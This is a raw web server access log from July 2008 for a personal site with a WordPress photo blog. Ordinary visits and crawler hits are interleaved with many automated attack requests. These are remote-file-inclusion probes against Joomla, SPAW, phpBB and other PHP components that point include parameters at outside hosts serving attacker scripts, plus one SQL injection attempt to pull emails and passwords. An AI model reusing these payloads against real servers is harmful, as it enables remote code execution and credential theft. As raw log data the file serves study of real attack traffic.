203.146.170.160 - - [13/Jul/2008:13:39:13 -0700] "GET /logs/access_080329.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.146.170.160 - - [13/Jul/2008:13:39:15 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 200 18595 "-" "libwww-perl/5.79" "www.dmulk.com"
203.146.170.160 - - [13/Jul/2008:13:39:24 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.174.82.134 - - [13/Jul/2008:13:40:09 -0700] "GET /logs/index.php?sourcedir=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.174.82.134 - - [13/Jul/2008:13:40:11 -0700] "GET /index.php?sourcedir=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 200 18439 "-" "libwww-perl/5.79" "www.dmulk.com"
202.174.82.134 - - [13/Jul/2008:13:40:16 -0700] "GET /logs/index.php?sourcedir=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.174.82.134 - - [13/Jul/2008:13:40:19 -0700] "GET /index.php?sourcedir=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 200 18439 "-" "libwww-perl/5.79" "www.dmulk.com"
80.87.85.202 - - [13/Jul/2008:13:40:27 -0700] "GET /logs/access.log HTTP/1.1" 200 449773 "http://www.zworks.com/srch/srch.cgi?what=2008-txt-%40hotmail.com%40yahoo.com%40gmail.com&tmpl=templ1a.html&flt=yes&pwrs=http%3A%2F%2Fwww.zworks.com%2Fpwrsrch2.html&mod=modules&p_p=30&sim_srch=0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
80.87.85.202 - - [13/Jul/2008:13:40:37 -0700] "GET / HTTP/1.1" 200 18241 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
80.87.85.202 - - [13/Jul/2008:13:40:40 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9232 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
80.87.85.202 - - [13/Jul/2008:13:40:44 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.1" 200 5241 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
80.87.85.202 - - [13/Jul/2008:13:40:45 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.1" 200 29867 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
80.87.85.202 - - [13/Jul/2008:13:40:46 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.1" 200 4019 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
80.67.25.167 - - [13/Jul/2008:13:40:46 -0700] "GET /logs/errors.php?error=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.25.167 - - [13/Jul/2008:13:40:46 -0700] "GET /errors.php?error=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.87.85.202 - - [13/Jul/2008:13:40:57 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.1" 200 8888 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
80.87.85.202 - - [13/Jul/2008:13:41:01 -0700] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.1" 200 6722 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
80.87.85.202 - - [13/Jul/2008:13:41:05 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgwide.jpg HTTP/1.1" 200 1014 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
80.87.85.202 - - [13/Jul/2008:13:41:05 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgcolor.jpg HTTP/1.1" 200 556 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
80.87.85.202 - - [13/Jul/2008:13:41:06 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 200 42010 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
80.87.85.202 - - [13/Jul/2008:13:41:09 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 200 42010 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
80.87.85.202 - - [13/Jul/2008:13:41:16 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=3&895 HTTP/1.1" 200 6289 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
80.87.85.202 - - [13/Jul/2008:13:41:22 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=1&880 HTTP/1.1" 200 19014 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
212.69.204.75 - - [13/Jul/2008:13:42:22 -0700] "GET /logs/vbgsitemap/errors.php?error=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
212.69.204.75 - - [13/Jul/2008:13:42:22 -0700] "GET /vbgsitemap/errors.php?error=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:13:42:37 -0700] "GET /logs//index.php?mosConfig_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:13:42:40 -0700] "GET //index.php?mosConfig_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 200 18431 "-" "libwww-perl/5.805" "www.dmulk.com"
68.142.212.191 - - [13/Jul/2008:13:43:22 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0004.jpg HTTP/1.0" 200 512676 "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)" "dmulk.com"
89.248.101.69 - - [13/Jul/2008:13:44:53 -0700] "GET /logs/access_080329.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.guardianbeast.helloweb.eu/idosyris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.87.85.202 - - [13/Jul/2008:13:45:20 -0700] "GET /blog/wp-content/uploads/2008/04/img_1120.JPG HTTP/1.1" 200 639232 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
203.146.170.160 - - [13/Jul/2008:13:45:32 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 200 18595 "-" "libwww-perl/5.79" "www.dmulk.com"
80.87.85.202 - - [13/Jul/2008:13:45:46 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0159.jpg HTTP/1.1" 200 381231 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
66.7.203.122 - - [13/Jul/2008:13:46:06 -0700] "GET /logs/access_071221.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.203.122 - - [13/Jul/2008:13:46:06 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.203.122 - - [13/Jul/2008:13:46:06 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.234.133.173 - - [13/Jul/2008:13:46:06 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
85.234.133.173 - - [13/Jul/2008:13:46:06 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
80.87.85.202 - - [13/Jul/2008:13:46:37 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0079.jpg HTTP/1.1" 200 262144 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
66.7.203.122 - - [13/Jul/2008:13:47:27 -0700] "GET /logs/access_071218.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.174.82.134 - - [13/Jul/2008:13:48:04 -0700] "GET /logs/errors.php?error=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.174.82.134 - - [13/Jul/2008:13:48:04 -0700] "GET /logs/errors.php?error=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.174.82.134 - - [13/Jul/2008:13:48:05 -0700] "GET /errors.php?error=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.174.82.134 - - [13/Jul/2008:13:48:05 -0700] "GET /errors.php?error=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.105.165 - - [13/Jul/2008:13:48:39 -0700] "GET /logs/access_071218.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.105.165 - - [13/Jul/2008:13:48:40 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.105.165 - - [13/Jul/2008:13:48:40 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.105.165 - - [13/Jul/2008:13:49:15 -0700] "GET /logs/access_071221.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.173.117 - - [13/Jul/2008:13:49:48 -0700] "GET /logs/access_080329.log//includes/functions_admin.php?phpbb_root_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [13/Jul/2008:13:49:49 -0700] "GET //includes/functions_admin.php?phpbb_root_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [13/Jul/2008:13:49:49 -0700] "GET /logs//includes/functions_admin.php?phpbb_root_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.246 - - [13/Jul/2008:13:50:08 -0700] "GET /bikes/dteel/15JAN08/?M=D HTTP/1.0" 200 694 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.67.24.32 - - [13/Jul/2008:13:51:24 -0700] "GET /logs//language/lang_english/errors.php?error=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.32 - - [13/Jul/2008:13:51:24 -0700] "GET //language/lang_english/errors.php?error=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.55.213.30 - - [13/Jul/2008:13:52:18 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.30 - - [13/Jul/2008:13:52:19 -0700] "GET /logs/access_071231.log HTTP/1.0" 200 225555 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
207.210.73.178 - - [13/Jul/2008:13:52:25 -0700] "GET /logs/access_080329.log/index.php?option=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A-- HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.197.170 - - [13/Jul/2008:13:52:26 -0700] "GET /theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.geocities.com/d3dy1/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
207.210.73.178 - - [13/Jul/2008:13:52:30 -0700] "GET /logs/index.php?option=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A-- HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.210.73.178 - - [13/Jul/2008:13:52:30 -0700] "GET /index.php?option=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A-- HTTP/1.1" 200 18439 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.197.170 - - [13/Jul/2008:13:52:54 -0700] "GET /logs/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.geocities.com/d3dy1/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
205.234.197.170 - - [13/Jul/2008:13:52:55 -0700] "GET /theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.geocities.com/d3dy1/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
65.55.213.30 - - [13/Jul/2008:13:52:57 -0700] "GET /logs/access_080220.log HTTP/1.0" 200 1718904 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
205.234.197.170 - - [13/Jul/2008:13:53:49 -0700] "GET /logs/access.log/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.geocities.com/d3dy1/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
205.234.197.170 - - [13/Jul/2008:13:53:49 -0700] "GET /theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.geocities.com/d3dy1/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
205.234.197.170 - - [13/Jul/2008:13:53:49 -0700] "GET /logs/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.geocities.com/d3dy1/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
212.143.233.40 - - [13/Jul/2008:13:54:02 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.143.233.40 - - [13/Jul/2008:13:54:03 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.250.45 - - [13/Jul/2008:13:55:54 -0700] "GET /logs/access_080207.log/port.php?content=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.250.45 - - [13/Jul/2008:13:55:55 -0700] "GET /port.php?content=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.250.45 - - [13/Jul/2008:13:55:55 -0700] "GET /logs/port.php?content=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.234.133.173 - - [13/Jul/2008:13:56:24 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [13/Jul/2008:13:56:24 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.1.115 - - [13/Jul/2008:13:58:09 -0700] "GET /logs/access.log/product.php?id=-626%20union%20select%200,email,2,3,4,password,6,7,8%20from%20Shoppers%20limit%202,1http://www.radio-htrm.de/apache/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.1.115 - - [13/Jul/2008:13:58:09 -0700] "GET /product.php?id=-626%20union%20select%200,email,2,3,4,password,6,7,8%20from%20Shoppers%20limit%202,1http://www.radio-htrm.de/apache/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.1.115 - - [13/Jul/2008:13:58:10 -0700] "GET /logs/product.php?id=-626%20union%20select%200,email,2,3,4,password,6,7,8%20from%20Shoppers%20limit%202,1http://www.radio-htrm.de/apache/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.143.183.8 - - [13/Jul/2008:13:58:24 -0700] "GET /logs/port.php?content=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.143.183.8 - - [13/Jul/2008:13:58:24 -0700] "GET /port.php?content=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.93.62.99 - - [13/Jul/2008:13:59:45 -0700] "GET /logs/port.php?content=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.99 - - [13/Jul/2008:13:59:46 -0700] "GET /port.php?content=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [13/Jul/2008:13:59:47 -0700] "GET /errors.php?error=http://www.voipanywhere.pt/language/r0x.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.203.122 - - [13/Jul/2008:14:00:02 -0700] "GET /logs/access_071213.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.203.122 - - [13/Jul/2008:14:00:12 -0700] "GET /logs/access_071224.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
201.130.79.34 - - [13/Jul/2008:14:01:05 -0700] "GET /logs/access_080315.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.34 - - [13/Jul/2008:14:01:06 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.34 - - [13/Jul/2008:14:01:06 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.34 - - [13/Jul/2008:14:01:07 -0700] "GET /logs/access_080315.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.34 - - [13/Jul/2008:14:01:07 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:14:01:07 -0700] "GET /logs/access_080315.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.79.34 - - [13/Jul/2008:14:01:07 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:14:01:08 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:14:01:08 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.17.155 - - [13/Jul/2008:14:01:09 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.52.57 - - [13/Jul/2008:14:01:15 -0700] "GET /blog/index.php/2008/04/03/hello-world/ HTTP/1.0" 200 6894 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
72.37.237.58 - - [13/Jul/2008:14:02:11 -0700] "GET /logs/access_080315.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.37.237.58 - - [13/Jul/2008:14:02:11 -0700] "GET /logs/access_080315.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.37.237.58 - - [13/Jul/2008:14:02:12 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.37.237.58 - - [13/Jul/2008:14:02:12 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.37.237.58 - - [13/Jul/2008:14:02:12 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.37.237.58 - - [13/Jul/2008:14:02:12 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.34 - - [13/Jul/2008:14:02:30 -0700] "GET /logs/access_080225.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.34 - - [13/Jul/2008:14:02:31 -0700] "GET /logs/access_080225.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [13/Jul/2008:14:03:10 -0700] "GET //class/class.dashboard_lms.php?where_framework=http://www.geocities.com/cripya/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.244 - - [13/Jul/2008:14:03:29 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.52.95 - - [13/Jul/2008:14:03:38 -0700] "GET /blog/index.php/2008/04/03/hello-world/trackback/ HTTP/1.0" 200 6894 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
66.7.203.122 - - [13/Jul/2008:14:04:31 -0700] "GET /logs/access_071219.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.203.122 - - [13/Jul/2008:14:04:31 -0700] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.203.122 - - [13/Jul/2008:14:04:32 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.37.237.58 - - [13/Jul/2008:14:04:58 -0700] "GET /logs/access_080225.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.37.237.58 - - [13/Jul/2008:14:04:59 -0700] "GET /logs/access_080225.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.203.122 - - [13/Jul/2008:14:05:26 -0700] "GET /logs/access_080103.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.234.133.173 - - [13/Jul/2008:14:05:50 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
85.234.133.173 - - [13/Jul/2008:14:05:51 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://legalref.ru/config/idscan.txt? HTTP/1.1" 200 18505 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
193.178.228.12 - - [13/Jul/2008:14:05:52 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
193.178.228.12 - - [13/Jul/2008:14:05:52 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
204.15.10.22 - - [13/Jul/2008:14:06:15 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
